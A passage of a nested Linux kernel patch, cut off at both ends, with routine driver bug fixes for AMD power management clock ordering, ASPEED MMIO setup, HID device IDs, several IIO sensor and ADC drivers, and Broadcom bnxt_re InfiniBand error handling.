+-	int i, size = 0, ret = 0;
++	int i, idx, size = 0, ret = 0;
+ 	uint32_t cur_value = 0, value = 0, count = 0;
+ 	bool cur_value_match_level = false;
+ 
+@@ -654,7 +654,8 @@ static int vangogh_print_legacy_clk_levels(struct smu_context *smu,
+ 	case SMU_MCLK:
+ 	case SMU_FCLK:
+ 		for (i = 0; i < count; i++) {
+-			ret = vangogh_get_dpm_clk_limited(smu, clk_type, i, &value);
++			idx = (clk_type == SMU_FCLK || clk_type == SMU_MCLK) ? (count - i - 1) : i;
++			ret = vangogh_get_dpm_clk_limited(smu, clk_type, idx, &value);
+ 			if (ret)
+ 				return ret;
+ 			if (!value)
+@@ -681,7 +682,7 @@ static int vangogh_print_clk_levels(struct smu_context *smu,
+ 	DpmClocks_t *clk_table = smu->smu_table.clocks_table;
+ 	SmuMetrics_t metrics;
+ 	struct smu_dpm_context *smu_dpm_ctx = &(smu->smu_dpm);
+-	int i, size = 0, ret = 0;
++	int i, idx, size = 0, ret = 0;
+ 	uint32_t cur_value = 0, value = 0, count = 0;
+ 	bool cur_value_match_level = false;
+ 	uint32_t min, max;
+@@ -763,7 +764,8 @@ static int vangogh_print_clk_levels(struct smu_context *smu,
+ 	case SMU_MCLK:
+ 	case SMU_FCLK:
+ 		for (i = 0; i < count; i++) {
+-			ret = vangogh_get_dpm_clk_limited(smu, clk_type, i, &value);
++			idx = (clk_type == SMU_FCLK || clk_type == SMU_MCLK) ? (count - i - 1) : i;
++			ret = vangogh_get_dpm_clk_limited(smu, clk_type, idx, &value);
+ 			if (ret)
+ 				return ret;
+ 			if (!value)
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c
+index 5cdc07165480b..8a8ba25c9ad7c 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c
+@@ -494,7 +494,7 @@ static int renoir_set_fine_grain_gfx_freq_parameters(struct smu_context *smu)
+ static int renoir_print_clk_levels(struct smu_context *smu,
+ 			enum smu_clk_type clk_type, char *buf)
+ {
+-	int i, size = 0, ret = 0;
++	int i, idx, size = 0, ret = 0;
+ 	uint32_t cur_value = 0, value = 0, count = 0, min = 0, max = 0;
+ 	SmuMetrics_t metrics;
+ 	struct smu_dpm_context *smu_dpm_ctx = &(smu->smu_dpm);
+@@ -594,7 +594,8 @@ static int renoir_print_clk_levels(struct smu_context *smu,
+ 	case SMU_VCLK:
+ 	case SMU_DCLK:
+ 		for (i = 0; i < count; i++) {
+-			ret = renoir_get_dpm_clk_limited(smu, clk_type, i, &value);
++			idx = (clk_type == SMU_FCLK || clk_type == SMU_MCLK) ? (count - i - 1) : i;
++			ret = renoir_get_dpm_clk_limited(smu, clk_type, idx, &value);
+ 			if (ret)
+ 				return ret;
+ 			if (!value)
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+index 8fa9a36c38b64..6d9760eac16d8 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+@@ -478,7 +478,7 @@ static int smu_v13_0_4_get_dpm_level_count(struct smu_context *smu,
+ static int smu_v13_0_4_print_clk_levels(struct smu_context *smu,
+ 					enum smu_clk_type clk_type, char *buf)
+ {
+-	int i, size = 0, ret = 0;
++	int i, idx, size = 0, ret = 0;
+ 	uint32_t cur_value = 0, value = 0, count = 0;
+ 	uint32_t min, max;
+ 
+@@ -512,7 +512,8 @@ static int smu_v13_0_4_print_clk_levels(struct smu_context *smu,
+ 			break;
+ 
+ 		for (i = 0; i < count; i++) {
+-			ret = smu_v13_0_4_get_dpm_freq_by_index(smu, clk_type, i, &value);
++			idx = (clk_type == SMU_FCLK || clk_type == SMU_MCLK) ? (count - i - 1) : i;
++			ret = smu_v13_0_4_get_dpm_freq_by_index(smu, clk_type, idx, &value);
+ 			if (ret)
+ 				break;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_5_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_5_ppt.c
+index 66445964efbd1..0081fa607e02e 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_5_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_5_ppt.c
+@@ -866,7 +866,7 @@ out:
+ static int smu_v13_0_5_print_clk_levels(struct smu_context *smu,
+ 				enum smu_clk_type clk_type, char *buf)
+ {
+-	int i, size = 0, ret = 0;
++	int i, idx, size = 0, ret = 0;
+ 	uint32_t cur_value = 0, value = 0, count = 0;
+ 	uint32_t min = 0, max = 0;
+ 
+@@ -898,7 +898,8 @@ static int smu_v13_0_5_print_clk_levels(struct smu_context *smu,
+ 			goto print_clk_out;
+ 
+ 		for (i = 0; i < count; i++) {
+-			ret = smu_v13_0_5_get_dpm_freq_by_index(smu, clk_type, i, &value);
++			idx = (clk_type == SMU_MCLK) ? (count - i - 1) : i;
++			ret = smu_v13_0_5_get_dpm_freq_by_index(smu, clk_type, idx, &value);
+ 			if (ret)
+ 				goto print_clk_out;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/yellow_carp_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/yellow_carp_ppt.c
+index 04e56b0b3033e..798f36cfcebd3 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/yellow_carp_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/yellow_carp_ppt.c
+@@ -1000,7 +1000,7 @@ out:
+ static int yellow_carp_print_clk_levels(struct smu_context *smu,
+ 				enum smu_clk_type clk_type, char *buf)
+ {
+-	int i, size = 0, ret = 0;
++	int i, idx, size = 0, ret = 0;
+ 	uint32_t cur_value = 0, value = 0, count = 0;
+ 	uint32_t min, max;
+ 
+@@ -1033,7 +1033,8 @@ static int yellow_carp_print_clk_levels(struct smu_context *smu,
+ 			goto print_clk_out;
+ 
+ 		for (i = 0; i < count; i++) {
+-			ret = yellow_carp_get_dpm_freq_by_index(smu, clk_type, i, &value);
++			idx = (clk_type == SMU_FCLK || clk_type == SMU_MCLK) ? (count - i - 1) : i;
++			ret = yellow_carp_get_dpm_freq_by_index(smu, clk_type, idx, &value);
+ 			if (ret)
+ 				goto print_clk_out;
+ 
+diff --git a/drivers/gpu/drm/ast/ast_main.c b/drivers/gpu/drm/ast/ast_main.c
+index 067453266897f..5df527051177a 100644
+--- a/drivers/gpu/drm/ast/ast_main.c
++++ b/drivers/gpu/drm/ast/ast_main.c
+@@ -427,11 +427,12 @@ struct ast_private *ast_device_create(const struct drm_driver *drv,
+ 		return ERR_PTR(-EIO);
+ 
+ 	/*
+-	 * If we don't have IO space at all, use MMIO now and
+-	 * assume the chip has MMIO enabled by default (rev 0x20
+-	 * and higher).
++	 * After AST2500, MMIO is enabled by default, and it should be adopted
++	 * to be compatible with Arm.
+ 	 */
+-	if (!(pci_resource_flags(pdev, 2) & IORESOURCE_IO)) {
++	if (pdev->revision >= 0x40) {
++		ast->ioregs = ast->regs + AST_IO_MM_OFFSET;
++	} else if (!(pci_resource_flags(pdev, 2) & IORESOURCE_IO)) {
+ 		drm_info(dev, "platform has no IO space, trying MMIO\n");
+ 		ast->ioregs = ast->regs + AST_IO_MM_OFFSET;
+ 	}
+diff --git a/drivers/gpu/drm/msm/msm_iommu.c b/drivers/gpu/drm/msm/msm_iommu.c
+index 5577cea7c0092..d12ba47b37c4f 100644
+--- a/drivers/gpu/drm/msm/msm_iommu.c
++++ b/drivers/gpu/drm/msm/msm_iommu.c
+@@ -227,7 +227,12 @@ struct msm_mmu *msm_iommu_pagetable_create(struct msm_mmu *parent)
+ 	/* Get the pagetable configuration from the domain */
+ 	if (adreno_smmu->cookie)
+ 		ttbr1_cfg = adreno_smmu->get_ttbr1_cfg(adreno_smmu->cookie);
+-	if (!ttbr1_cfg)
++
++	/*
++	 * If you hit this WARN_ONCE() you are probably missing an entry in
++	 * qcom_smmu_impl_of_match[] in arm-smmu-qcom.c
++	 */
++	if (WARN_ONCE(!ttbr1_cfg, "No per-process page tables"))
+ 		return ERR_PTR(-ENODEV);
+ 
+ 	/*
+diff --git a/drivers/hid/hid-google-hammer.c b/drivers/hid/hid-google-hammer.c
+index 7ae5f27df54dd..c6bdb9c4ef3e0 100644
+--- a/drivers/hid/hid-google-hammer.c
++++ b/drivers/hid/hid-google-hammer.c
+@@ -586,6 +586,8 @@ static const struct hid_device_id hammer_devices[] = {
+ 		     USB_VENDOR_ID_GOOGLE, USB_DEVICE_ID_GOOGLE_EEL) },
+ 	{ HID_DEVICE(BUS_USB, HID_GROUP_GENERIC,
+ 		     USB_VENDOR_ID_GOOGLE, USB_DEVICE_ID_GOOGLE_HAMMER) },
++	{ HID_DEVICE(BUS_USB, HID_GROUP_GENERIC,
++		     USB_VENDOR_ID_GOOGLE, USB_DEVICE_ID_GOOGLE_JEWEL) },
+ 	{ HID_DEVICE(BUS_USB, HID_GROUP_GENERIC,
+ 		     USB_VENDOR_ID_GOOGLE, USB_DEVICE_ID_GOOGLE_MAGNEMITE) },
+ 	{ HID_DEVICE(BUS_USB, HID_GROUP_GENERIC,
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 53c6692d77714..653db6cdab579 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -523,6 +523,7 @@
+ #define USB_DEVICE_ID_GOOGLE_MOONBALL	0x5044
+ #define USB_DEVICE_ID_GOOGLE_DON	0x5050
+ #define USB_DEVICE_ID_GOOGLE_EEL	0x5057
++#define USB_DEVICE_ID_GOOGLE_JEWEL	0x5061
+ 
+ #define USB_VENDOR_ID_GOTOP		0x08f2
+ #define USB_DEVICE_ID_SUPER_Q2		0x007f
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index d2f500242ed40..9c30dd30537af 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -826,7 +826,7 @@ static int wacom_intuos_inout(struct wacom_wac *wacom)
+ 	/* Enter report */
+ 	if ((data[1] & 0xfc) == 0xc0) {
+ 		/* serial number of the tool */
+-		wacom->serial[idx] = ((data[3] & 0x0f) << 28) +
++		wacom->serial[idx] = ((__u64)(data[3] & 0x0f) << 28) +
+ 			(data[4] << 20) + (data[5] << 12) +
+ 			(data[6] << 4) + (data[7] >> 4);
+ 
+diff --git a/drivers/hwmon/k10temp.c b/drivers/hwmon/k10temp.c
+index be8bbb1c3a02d..823d0ca1d6059 100644
+--- a/drivers/hwmon/k10temp.c
++++ b/drivers/hwmon/k10temp.c
+@@ -507,6 +507,7 @@ static const struct pci_device_id k10temp_id_table[] = {
+ 	{ PCI_VDEVICE(AMD, PCI_DEVICE_ID_AMD_19H_M50H_DF_F3) },
+ 	{ PCI_VDEVICE(AMD, PCI_DEVICE_ID_AMD_19H_M60H_DF_F3) },
+ 	{ PCI_VDEVICE(AMD, PCI_DEVICE_ID_AMD_19H_M70H_DF_F3) },
++	{ PCI_VDEVICE(AMD, PCI_DEVICE_ID_AMD_19H_M78H_DF_F3) },
+ 	{ PCI_VDEVICE(HYGON, PCI_DEVICE_ID_AMD_17H_DF_F3) },
+ 	{}
+ };
+diff --git a/drivers/iio/accel/st_accel_core.c b/drivers/iio/accel/st_accel_core.c
+index c8c8eb15c34e6..c4143c5678746 100644
+--- a/drivers/iio/accel/st_accel_core.c
++++ b/drivers/iio/accel/st_accel_core.c
+@@ -1289,12 +1289,12 @@ static int apply_acpi_orientation(struct iio_dev *indio_dev)
+ 
+ 	adev = ACPI_COMPANION(indio_dev->dev.parent);
+ 	if (!adev)
+-		return 0;
++		return -ENXIO;
+ 
+ 	/* Read _ONT data, which should be a package of 6 integers. */
+ 	status = acpi_evaluate_object(adev->handle, "_ONT", NULL, &buffer);
+ 	if (status == AE_NOT_FOUND) {
+-		return 0;
++		return -ENXIO;
+ 	} else if (ACPI_FAILURE(status)) {
+ 		dev_warn(&indio_dev->dev, "failed to execute _ONT: %d\n",
+ 			 status);
+diff --git a/drivers/iio/adc/ad7192.c b/drivers/iio/adc/ad7192.c
+index d71977be7d228..a8f6fa48daa8e 100644
+--- a/drivers/iio/adc/ad7192.c
++++ b/drivers/iio/adc/ad7192.c
+@@ -898,10 +898,6 @@ static const struct iio_info ad7195_info = {
+ 	__AD719x_CHANNEL(_si, _channel1, -1, _address, NULL, IIO_VOLTAGE, \
+ 		BIT(IIO_CHAN_INFO_SCALE), ad7192_calibsys_ext_info)
+ 
+-#define AD719x_SHORTED_CHANNEL(_si, _channel1, _address) \
+-	__AD719x_CHANNEL(_si, _channel1, -1, _address, "shorted", IIO_VOLTAGE, \
+-		BIT(IIO_CHAN_INFO_SCALE), ad7192_calibsys_ext_info)
+-
+ #define AD719x_TEMP_CHANNEL(_si, _address) \
+ 	__AD719x_CHANNEL(_si, 0, -1, _address, NULL, IIO_TEMP, 0, NULL)
+ 
+@@ -909,7 +905,7 @@ static const struct iio_chan_spec ad7192_channels[] = {
+ 	AD719x_DIFF_CHANNEL(0, 1, 2, AD7192_CH_AIN1P_AIN2M),
+ 	AD719x_DIFF_CHANNEL(1, 3, 4, AD7192_CH_AIN3P_AIN4M),
+ 	AD719x_TEMP_CHANNEL(2, AD7192_CH_TEMP),
+-	AD719x_SHORTED_CHANNEL(3, 2, AD7192_CH_AIN2P_AIN2M),
++	AD719x_DIFF_CHANNEL(3, 2, 2, AD7192_CH_AIN2P_AIN2M),
+ 	AD719x_CHANNEL(4, 1, AD7192_CH_AIN1),
+ 	AD719x_CHANNEL(5, 2, AD7192_CH_AIN2),
+ 	AD719x_CHANNEL(6, 3, AD7192_CH_AIN3),
+@@ -923,7 +919,7 @@ static const struct iio_chan_spec ad7193_channels[] = {
+ 	AD719x_DIFF_CHANNEL(2, 5, 6, AD7193_CH_AIN5P_AIN6M),
+ 	AD719x_DIFF_CHANNEL(3, 7, 8, AD7193_CH_AIN7P_AIN8M),
+ 	AD719x_TEMP_CHANNEL(4, AD7193_CH_TEMP),
+-	AD719x_SHORTED_CHANNEL(5, 2, AD7193_CH_AIN2P_AIN2M),
++	AD719x_DIFF_CHANNEL(5, 2, 2, AD7193_CH_AIN2P_AIN2M),
+ 	AD719x_CHANNEL(6, 1, AD7193_CH_AIN1),
+ 	AD719x_CHANNEL(7, 2, AD7193_CH_AIN2),
+ 	AD719x_CHANNEL(8, 3, AD7193_CH_AIN3),
+diff --git a/drivers/iio/adc/ad_sigma_delta.c b/drivers/iio/adc/ad_sigma_delta.c
+index d8570f620785a..7e21928707437 100644
+--- a/drivers/iio/adc/ad_sigma_delta.c
++++ b/drivers/iio/adc/ad_sigma_delta.c
+@@ -584,6 +584,10 @@ static int devm_ad_sd_probe_trigger(struct device *dev, struct iio_dev *indio_de
+ 	init_completion(&sigma_delta->completion);
+ 
+ 	sigma_delta->irq_dis = true;
++
++	/* the IRQ core clears IRQ_DISABLE_UNLAZY flag when freeing an IRQ */
++	irq_set_status_flags(sigma_delta->spi->irq, IRQ_DISABLE_UNLAZY);
++
+ 	ret = devm_request_irq(dev, sigma_delta->spi->irq,
+ 			       ad_sd_data_rdy_trig_poll,
+ 			       sigma_delta->info->irq_flags | IRQF_NO_AUTOEN,
+diff --git a/drivers/iio/adc/mxs-lradc-adc.c b/drivers/iio/adc/mxs-lradc-adc.c
+index bca79a93cbe43..a50f39143d3ea 100644
+--- a/drivers/iio/adc/mxs-lradc-adc.c
++++ b/drivers/iio/adc/mxs-lradc-adc.c
+@@ -757,13 +757,13 @@ static int mxs_lradc_adc_probe(struct platform_device *pdev)
+ 
+ 	ret = mxs_lradc_adc_trigger_init(iio);
+ 	if (ret)
+-		goto err_trig;
++		return ret;
+ 
+ 	ret = iio_triggered_buffer_setup(iio, &iio_pollfunc_store_time,
+ 					 &mxs_lradc_adc_trigger_handler,
+ 					 &mxs_lradc_adc_buffer_ops);
+ 	if (ret)
+-		return ret;
++		goto err_trig;
+ 
+ 	adc->vref_mv = mxs_lradc_adc_vref_mv[lradc->soc];
+ 
+@@ -801,9 +801,9 @@ static int mxs_lradc_adc_probe(struct platform_device *pdev)
+ 
+ err_dev:
+ 	mxs_lradc_adc_hw_stop(adc);
+-	mxs_lradc_adc_trigger_remove(iio);
+-err_trig:
+ 	iio_triggered_buffer_cleanup(iio);
++err_trig:
++	mxs_lradc_adc_trigger_remove(iio);
+ 	return ret;
+ }
+ 
+@@ -814,8 +814,8 @@ static int mxs_lradc_adc_remove(struct platform_device *pdev)
+ 
+ 	iio_device_unregister(iio);
+ 	mxs_lradc_adc_hw_stop(adc);
+-	mxs_lradc_adc_trigger_remove(iio);
+ 	iio_triggered_buffer_cleanup(iio);
++	mxs_lradc_adc_trigger_remove(iio);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/iio/adc/stm32-adc.c b/drivers/iio/adc/stm32-adc.c
+index 3cda529f081db..a5d5b7b3823bc 100644
+--- a/drivers/iio/adc/stm32-adc.c
++++ b/drivers/iio/adc/stm32-adc.c
+@@ -1882,16 +1882,15 @@ static int stm32_adc_get_legacy_chan_count(struct iio_dev *indio_dev, struct stm
+ 	 * to get the *real* number of channels.
+ 	 */
+ 	ret = device_property_count_u32(dev, "st,adc-diff-channels");
+-	if (ret < 0)
+-		return ret;
+-
+-	ret /= (int)(sizeof(struct stm32_adc_diff_channel) / sizeof(u32));
+-	if (ret > adc_info->max_channels) {
+-		dev_err(&indio_dev->dev, "Bad st,adc-diff-channels?\n");
+-		return -EINVAL;
+-	} else if (ret > 0) {
+-		adc->num_diff = ret;
+-		num_channels += ret;
++	if (ret > 0) {
++		ret /= (int)(sizeof(struct stm32_adc_diff_channel) / sizeof(u32));
++		if (ret > adc_info->max_channels) {
++			dev_err(&indio_dev->dev, "Bad st,adc-diff-channels?\n");
++			return -EINVAL;
++		} else if (ret > 0) {
++			adc->num_diff = ret;
++			num_channels += ret;
++		}
+ 	}
+ 
+ 	/* Optional sample time is provided either for each, or all channels */
+@@ -1913,6 +1912,7 @@ static int stm32_adc_legacy_chan_init(struct iio_dev *indio_dev,
+ 	struct stm32_adc_diff_channel diff[STM32_ADC_CH_MAX];
+ 	struct device *dev = &indio_dev->dev;
+ 	u32 num_diff = adc->num_diff;
++	int num_se = nchans - num_diff;
+ 	int size = num_diff * sizeof(*diff) / sizeof(u32);
+ 	int scan_index = 0, ret, i, c;
+ 	u32 smp = 0, smps[STM32_ADC_CH_MAX], chans[STM32_ADC_CH_MAX];
+@@ -1939,29 +1939,32 @@ static int stm32_adc_legacy_chan_init(struct iio_dev *indio_dev,
+ 			scan_index++;
+ 		}
+ 	}
+-
+-	ret = device_property_read_u32_array(dev, "st,adc-channels", chans,
+-					     nchans);
+-	if (ret)
+-		return ret;
+-
+-	for (c = 0; c < nchans; c++) {
+-		if (chans[c] >= adc_info->max_channels) {
+-			dev_err(&indio_dev->dev, "Invalid channel %d\n",
+-				chans[c]);
+-			return -EINVAL;
++	if (num_se > 0) {
++		ret = device_property_read_u32_array(dev, "st,adc-channels", chans, num_se);
++		if (ret) {
++			dev_err(&indio_dev->dev, "Failed to get st,adc-channels %d\n", ret);
++			return ret;
+ 		}
+ 
+-		/* Channel can't be configured both as single-ended & diff */
+-		for (i = 0; i < num_diff; i++) {
+-			if (chans[c] == diff[i].vinp) {
+-				dev_err(&indio_dev->dev, "channel %d misconfigured\n",	chans[c]);
++		for (c = 0; c < num_se; c++) {
++			if (chans[c] >= adc_info->max_channels) {
++				dev_err(&indio_dev->dev, "Invalid channel %d\n",
++					chans[c]);
+ 				return -EINVAL;
+ 			}
++
++			/* Channel can't be configured both as single-ended & diff */
++			for (i = 0; i < num_diff; i++) {
++				if (chans[c] == diff[i].vinp) {
++					dev_err(&indio_dev->dev, "channel %d misconfigured\n",
++						chans[c]);
++					return -EINVAL;
++				}
++			}
++			stm32_adc_chan_init_one(indio_dev, &channels[scan_index],
++						chans[c], 0, scan_index, false);
++			scan_index++;
+ 		}
+-		stm32_adc_chan_init_one(indio_dev, &channels[scan_index],
+-					chans[c], 0, scan_index, false);
+-		scan_index++;
+ 	}
+ 
+ 	if (adc->nsmps > 0) {
+@@ -2153,7 +2156,7 @@ static int stm32_adc_chan_fw_init(struct iio_dev *indio_dev, bool timestamping)
+ 
+ 	if (legacy)
+ 		ret = stm32_adc_legacy_chan_init(indio_dev, adc, channels,
+-						 num_channels);
++						 timestamping ? num_channels - 1 : num_channels);
+ 	else
+ 		ret = stm32_adc_generic_chan_init(indio_dev, adc, channels);
+ 	if (ret < 0)
+diff --git a/drivers/iio/addac/ad74413r.c b/drivers/iio/addac/ad74413r.c
+index e0e130ba9d3ec..05faf3910bfc6 100644
+--- a/drivers/iio/addac/ad74413r.c
++++ b/drivers/iio/addac/ad74413r.c
+@@ -973,7 +973,7 @@ static int ad74413r_read_raw(struct iio_dev *indio_dev,
+ 
+ 		ret = ad74413r_get_single_adc_result(indio_dev, chan->channel,
+ 						     val);
+-		if (ret)
++		if (ret < 0)
+ 			return ret;
+ 
+ 		ad74413r_adc_to_resistance_result(*val, val);
+diff --git a/drivers/iio/dac/Makefile b/drivers/iio/dac/Makefile
+index ec3e42713f000..e22d9b4bac807 100644
+--- a/drivers/iio/dac/Makefile
++++ b/drivers/iio/dac/Makefile
+@@ -17,7 +17,7 @@ obj-$(CONFIG_AD5592R_BASE) += ad5592r-base.o
+ obj-$(CONFIG_AD5592R) += ad5592r.o
+ obj-$(CONFIG_AD5593R) += ad5593r.o
+ obj-$(CONFIG_AD5755) += ad5755.o
+-obj-$(CONFIG_AD5755) += ad5758.o
++obj-$(CONFIG_AD5758) += ad5758.o
+ obj-$(CONFIG_AD5761) += ad5761.o
+ obj-$(CONFIG_AD5764) += ad5764.o
+ obj-$(CONFIG_AD5766) += ad5766.o
+diff --git a/drivers/iio/dac/mcp4725.c b/drivers/iio/dac/mcp4725.c
+index 446d1a8fe4bef..2be821d561c49 100644
+--- a/drivers/iio/dac/mcp4725.c
++++ b/drivers/iio/dac/mcp4725.c
+@@ -47,12 +47,18 @@ static int mcp4725_suspend(struct device *dev)
+ 	struct mcp4725_data *data = iio_priv(i2c_get_clientdata(
+ 		to_i2c_client(dev)));
+ 	u8 outbuf[2];
++	int ret;
+ 
+ 	outbuf[0] = (data->powerdown_mode + 1) << 4;
+ 	outbuf[1] = 0;
+ 	data->powerdown = true;
+ 
+-	return i2c_master_send(data->client, outbuf, 2);
++	ret = i2c_master_send(data->client, outbuf, 2);
++	if (ret < 0)
++		return ret;
++	else if (ret != 2)
++		return -EIO;
++	return 0;
+ }
+ 
+ static int mcp4725_resume(struct device *dev)
+@@ -60,13 +66,19 @@ static int mcp4725_resume(struct device *dev)
+ 	struct mcp4725_data *data = iio_priv(i2c_get_clientdata(
+ 		to_i2c_client(dev)));
+ 	u8 outbuf[2];
++	int ret;
+ 
+ 	/* restore previous DAC value */
+ 	outbuf[0] = (data->dac_value >> 8) & 0xf;
+ 	outbuf[1] = data->dac_value & 0xff;
+ 	data->powerdown = false;
+ 
+-	return i2c_master_send(data->client, outbuf, 2);
++	ret = i2c_master_send(data->client, outbuf, 2);
++	if (ret < 0)
++		return ret;
++	else if (ret != 2)
++		return -EIO;
++	return 0;
+ }
+ static DEFINE_SIMPLE_DEV_PM_OPS(mcp4725_pm_ops, mcp4725_suspend,
+ 				mcp4725_resume);
+diff --git a/drivers/iio/imu/inv_icm42600/inv_icm42600_buffer.c b/drivers/iio/imu/inv_icm42600/inv_icm42600_buffer.c
+index 99576b2c171f4..32d7f83642303 100644
+--- a/drivers/iio/imu/inv_icm42600/inv_icm42600_buffer.c
++++ b/drivers/iio/imu/inv_icm42600/inv_icm42600_buffer.c
+@@ -275,9 +275,14 @@ static int inv_icm42600_buffer_preenable(struct iio_dev *indio_dev)
+ {
+ 	struct inv_icm42600_state *st = iio_device_get_drvdata(indio_dev);
+ 	struct device *dev = regmap_get_device(st->map);
++	struct inv_icm42600_timestamp *ts = iio_priv(indio_dev);
+ 
+ 	pm_runtime_get_sync(dev);
+ 
++	mutex_lock(&st->lock);
++	inv_icm42600_timestamp_reset(ts);
++	mutex_unlock(&st->lock);
++
+ 	return 0;
+ }
+ 
+@@ -375,7 +380,6 @@ static int inv_icm42600_buffer_postdisable(struct iio_dev *indio_dev)
+ 	struct device *dev = regmap_get_device(st->map);
+ 	unsigned int sensor;
+ 	unsigned int *watermark;
+-	struct inv_icm42600_timestamp *ts;
+ 	struct inv_icm42600_sensor_conf conf = INV_ICM42600_SENSOR_CONF_INIT;
+ 	unsigned int sleep_temp = 0;
+ 	unsigned int sleep_sensor = 0;
+@@ -385,11 +389,9 @@ static int inv_icm42600_buffer_postdisable(struct iio_dev *indio_dev)
+ 	if (indio_dev == st->indio_gyro) {
+ 		sensor = INV_ICM42600_SENSOR_GYRO;
+ 		watermark = &st->fifo.watermark.gyro;
+-		ts = iio_priv(st->indio_gyro);
+ 	} else if (indio_dev == st->indio_accel) {
+ 		sensor = INV_ICM42600_SENSOR_ACCEL;
+ 		watermark = &st->fifo.watermark.accel;
+-		ts = iio_priv(st->indio_accel);
+ 	} else {
+ 		return -EINVAL;
+ 	}
+@@ -417,8 +419,6 @@ static int inv_icm42600_buffer_postdisable(struct iio_dev *indio_dev)
+ 	if (!st->fifo.on)
+ 		ret = inv_icm42600_set_temp_conf(st, false, &sleep_temp);
+ 
+-	inv_icm42600_timestamp_reset(ts);
+-
+ out_unlock:
+ 	mutex_unlock(&st->lock);
+ 
+diff --git a/drivers/iio/light/vcnl4035.c b/drivers/iio/light/vcnl4035.c
+index 3ed37f6057fbf..a23c415fcb7aa 100644
+--- a/drivers/iio/light/vcnl4035.c
++++ b/drivers/iio/light/vcnl4035.c
+@@ -8,6 +8,7 @@
+  * TODO: Proximity
+  */
+ #include <linux/bitops.h>
++#include <linux/bitfield.h>
+ #include <linux/i2c.h>
+ #include <linux/module.h>
+ #include <linux/pm_runtime.h>
+@@ -42,6 +43,7 @@
+ #define VCNL4035_ALS_PERS_MASK		GENMASK(3, 2)
+ #define VCNL4035_INT_ALS_IF_H_MASK	BIT(12)
+ #define VCNL4035_INT_ALS_IF_L_MASK	BIT(13)
++#define VCNL4035_DEV_ID_MASK		GENMASK(7, 0)
+ 
+ /* Default values */
+ #define VCNL4035_MODE_ALS_ENABLE	BIT(0)
+@@ -413,6 +415,7 @@ static int vcnl4035_init(struct vcnl4035_data *data)
+ 		return ret;
+ 	}
+ 
++	id = FIELD_GET(VCNL4035_DEV_ID_MASK, id);
+ 	if (id != VCNL4035_DEV_ID_VAL) {
+ 		dev_err(&data->client->dev, "Wrong id, got %x, expected %x\n",
+ 			id, VCNL4035_DEV_ID_VAL);
+diff --git a/drivers/infiniband/hw/bnxt_re/ib_verbs.c b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+index 989edc7896338..94222de1d3719 100644
+--- a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
++++ b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+@@ -3241,9 +3241,7 @@ static int bnxt_re_process_raw_qp_pkt_rx(struct bnxt_re_qp *gsi_qp,
+ 	udwr.remote_qkey = gsi_sqp->qplib_qp.qkey;
+ 
+ 	/* post data received  in the send queue */
+-	rc = bnxt_re_post_send_shadow_qp(rdev, gsi_sqp, swr);
+-
+-	return 0;
++	return bnxt_re_post_send_shadow_qp(rdev, gsi_sqp, swr);
+ }
+ 
+ static void bnxt_re_process_res_rawqp1_wc(struct ib_wc *wc,
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_fp.c b/drivers/infiniband/hw/bnxt_re/qplib_fp.c
+index 96e581ced50e2..ab2cc1c67f70b 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_fp.c
++++ b/drivers/infiniband/hw/bnxt_re/qplib_fp.c
+@@ -2043,6 +2043,12 @@ int bnxt_qplib_create_cq(struct bnxt_qplib_res *res, struct bnxt_qplib_cq *cq)
+ 	u32 pg_sz_lvl;
+ 	int rc;
+ 
++	if (!cq->dpi) {
++		dev_err(&rcfw->pdev->dev,
++			"FP: CREATE_CQ failed due to NULL DPI\n");
++		return -EINVAL;
++	}
++
+ 	hwq_attr.res = res;
+ 	hwq_attr.depth = cq->max_wqe;
+ 	hwq_attr.stride = sizeof(struct cq_base);
+@@ -2054,11 +2060,6 @@ int bnxt_qplib_create_cq(struct bnxt_qplib_res *res, struct bnxt_qplib_cq *cq)
+ 
+ 	RCFW_CMD_PREP(req, CREATE_CQ, cmd_flags);
+ 
+-	if (!cq->dpi) {
+-		dev_err(&rcfw->pdev->dev,
+-			"FP: CREATE_CQ failed due to NULL DPI\n");
+-		return -EINVAL;
+-	}
+ 	req.dpi = cpu_to_le32(cq->dpi->dpi);
+ 	req.cq_handle = cpu_to_le64(cq->cq_handle);
+ 	req.cq_size = cpu_to_le32(cq->hwq.max_elements);
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_res.c b/drivers/infiniband/hw/bnxt_re/qplib_res.c
+index 126d4f26f75ad..81b0c5e879f9e 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_res.c
++++ b/drivers/infiniband/hw/bnxt_re/qplib_res.c
+@@ -215,17 +215,9 @@ int bnxt_qplib_alloc_init_hwq(struct bnxt_qplib_hwq *hwq,
+ 			return -EINVAL;
+ 		hwq_attr->sginfo->npages = npages;
+ 	} else {
